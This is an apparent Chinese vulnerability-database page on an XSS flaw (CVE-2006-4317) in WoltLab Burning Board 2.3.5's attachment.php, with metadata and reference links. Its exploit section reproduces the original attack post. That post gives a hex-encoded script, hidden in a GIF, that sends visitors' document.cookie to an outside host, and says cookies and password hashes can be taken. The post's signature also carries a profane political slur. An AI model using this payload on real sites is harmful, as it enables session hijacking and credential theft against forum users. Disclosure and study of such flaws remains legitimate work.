Woltlab Burning Board 'Attachment.php' 跨站脚本攻击(XSS)漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193740 漏洞类型 跨站脚本
发布时间 2006-08-23 更新时间 2006-09-19
CVE编号 CVE-2006-4317 CNNVD-ID CNNVD-200608-389
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080152
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-389
|漏洞详情
WoltLabBurningBoard(WBB)2.3.5中的attachment.php脚本存在跨站脚本攻击(XSS)漏洞,远程攻击者可借助包含URL编码的Javascript的GIF图像文件注入任意Web脚本或HTML。
|漏洞EXP
Hi

################################################

WBB in XSS We aren't able to bite from the Avatar ,But attachment.php With xss code are able to bite.

################################################

HEX editor With GIF picture Open , JS code are writing.

~~~~~~ GIF89ajscode ~~~~~~

Js Code:Hex:

%3c%73%63%72%69%70%74%3e%69%6d%67%20%3d%20%6e%65%77%20%49%6d%61%67%65%28
%29%3b%20%69%6d%67%2e%73%72%63%20%3d%20%22%68%74%74%70%3a%2f%2f%77%77%77
%2e%6c%61%73%74%66%6f%72%63%65%2e%63%6f%6d%2f%5a%2f%73%2e%70%68%70%3f%22
%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70
%74%3e

#################################################

We are joining official to the page,but Attachment do.and attachment taking the address.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~

http://Site/WBB/attachment.php?attachmentid=ID

Cookies , MD5  able to take

######################################

ZeberuS || Redworm

ZeberuS (at) ZeberuS (dot) com [email concealed] || Redworm (at) Redworm (dot) Us [email concealed]

Kahrolsun Pkk Aq

Now War Israel ! Stop War !
|参考资料

来源:XF
名称:wbb-attachment-xss(28481)
链接:http://xforce.iss.net/xforce/xfdb/28481
来源:BID
名称:19639
链接:http://www.securityfocus.com/bid/19639
来源:BUGTRAQ
名称:20060820WoltLabBurningBoard2.3.5(WBB)inXSS
链接:http://www.securityfocus.com/archive/1/archive/1/443876/100/0/threaded
来源:SECUNIA
名称:21580
链接:http://secunia.com/advisories/21580
来源:SREASON
名称:1443
链接:http://securityreason.com/securityalert/1443